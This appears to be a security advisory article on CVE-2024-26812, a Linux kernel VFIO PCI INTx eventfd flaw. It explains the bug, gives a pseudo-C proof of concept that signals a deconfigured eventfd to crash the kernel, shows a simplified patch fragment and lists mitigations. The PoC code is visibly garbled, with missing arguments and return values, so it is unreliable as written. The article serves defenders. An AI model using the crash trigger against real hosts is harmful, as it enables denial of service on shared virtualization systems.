In early 2024, a security vulnerability was discovered in the Linux kernel’s VFIO PCI subsystem, tracked as CVE-2024-26812. This flaw affects how Virtual Function I/O (VFIO) devices handle legacy INTx interrupts, causing a possible improper handling of eventfd objects. It could let attackers interact with released or unconfigured eventfds, potentially leading to crashes, information leaks, or denial-of-service. This article explains the vulnerability, provides code examples, shows how it could be exploited, and references the official patch.
## What is VFIO/PASSTHROUGH PCI and INTx?
- VFIO: A Linux kernel framework allowing safe direct hardware device access to userspace (e.g., for virtual machines).
- INTx: A traditional PCI interrupt (think IRQ lines from old PCs), handled through signals in VFIO via eventfds.
A user space process (like QEMU) sets up a "trigger" (an eventfd) so it can be notified (or notify the kernel) when a hardware interrupt occurs. The mapping between device events and these eventfds is managed by kernel IOCTLs.
Vulnerability Details
The bug: VFIO/PASSTHROUGH PCI lets eventfds be detached ("deconfigured") with the kernel unregistering irq handlers. However, the eventfd reference can stay alive, so if it’s signaled (for instance, by a misbehaving QEMU or attacker) it ends up using a NULL context. This can happen either with VFIO_DEVICE_SET_IRQS ioctl or via unmask irqfd, even after the INTx context is supposedly gone.
This is dangerous because now, a callback may fire with a NULL pointer, possibly leading to a NULL pointer dereference (kernel panic), or undefined behavior.
The challenge: Synchronization. The code used a lock (igate mutex) for serial access, but the eventfd callbacks themselves are atomic and can’t acquire this lock.
Exploit Scenario
This is a local privilege escalation or denial-of-service (DoS) opportunity. Typically, the attacker must have privileges to control VFIO devices (usually root, or inside a VM/QEMU instance). They can:
Deconfigure (release) the eventfd, or change its value, removing its context.
3. Fire the same eventfd (with a crafted ioctl or IRQ unmask), tricking the kernel into acting on a NULL pointer.
For demonstration, here’s how a malicious user process could try to trigger the bug using pseudo-C code:
#include <linux/vfio.h>
#include <sys/eventfd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdio.h>
// Assume vfio_device_fd is an already opened VFIO device
// and the attacker has privileges.
int main() {
int vfio_device_fd = open("/dev/vfio/XX", O_RDWR);
int efd = eventfd(, );
// 1. Register INTx eventfd
struct vfio_irq_set *irq_set;
irq_set = malloc(sizeof(*irq_set) + sizeof(int));
irq_set->argsz = sizeof(*irq_set) + sizeof(int);
irq_set->flags = VFIO_IRQ_SET_DATA_EVENTFD | VFIO_IRQ_SET_ACTION_TRIGGER;
irq_set->index = VFIO_PCI_INTX_IRQ_INDEX;
irq_set->start = ;
irq_set->count = 1;
*(int *)(irq_set + 1) = efd;
ioctl(vfio_device_fd, VFIO_DEVICE_SET_IRQS, irq_set);
// 2. Deconfigure INTx eventfd
irq_set->flags = VFIO_IRQ_SET_DATA_NONE | VFIO_IRQ_SET_ACTION_TRIGGER;
ioctl(vfio_device_fd, VFIO_DEVICE_SET_IRQS, irq_set);
// 3. Manually signal the stale eventfd
uint64_t buf = 1;
write(efd, &buf, 8);
// ... Kernel may crash or misbehave here!
close(efd);
close(vfio_device_fd);
free(irq_set);
return ;
}
> Note: The above is simplified and meant for educational purposes only! Don’t run on production. Real attacks could be more reliable or sophisticated.
The Patch: Creating a Persistent INTx Handler
The solution, introduced here (and committed with this diff), changes the code to:
INTx context object now tracks the actual handler lifetime, not tied to the eventfd's.
- Added synchronization between IOCTL and eventfd callback paths, so the kernel doesn't free context before it’s really unused.
Fragment from the fix (heavily simplified)
// Control INTx context lifetime independently of eventfd registration
struct vfio_pci_intx {
// ... other members
struct eventfd_ctx *trigger;
};
void vfio_pci_intx_set_trigger(struct vfio_pci_intx *intx, struct eventfd_ctx *ctx)
{
// Atomically swap trigger, careful with NULLs
spin_lock(&intx->lock);
eventfd_ctx_put(intx->trigger);
intx->trigger = ctx;
spin_unlock(&intx->lock);
}
// In eventfd_signal wrapper, context is always valid (until close)
Key Takeaway: Now, signaling a released/deconfigured eventfd will no longer reach a NULL context, and both kernel and userspace can update triggers safely.
How to Stay Safe
- Update to the latest kernel with this patch backported! Most modern Linux distributions have already done so in their security updates.
Limit VFIO device access to trusted users only.
- Use seccomp/apparmor/SELinux for additional containment.
References
- Official Patch on lore.kernel.org
- Git commit fixing CVE-2024-26812
- NVD/CVE Entry for CVE-2024-26812 *(check for updates)*
Summary
CVE-2024-26812 might seem niche, but with modern virtualization reliant on device passthrough, a kernel panic or widenable attack surface in VFIO is a critical concern for cloud or desktop Linux. The Linux community patched this promptly. If you handle VFIO PCI (like with QEMU, KVM, or SR-IOV setups), make sure your systems are updated!
Stay patched, stay safe!
*This article is exclusive and was written in simple American English for security practitioners and curious readers alike.*
Timeline
Published on: 04/05/2024 09:15:09 UTC
Last modified on: 03/18/2025 17:04:12 UTC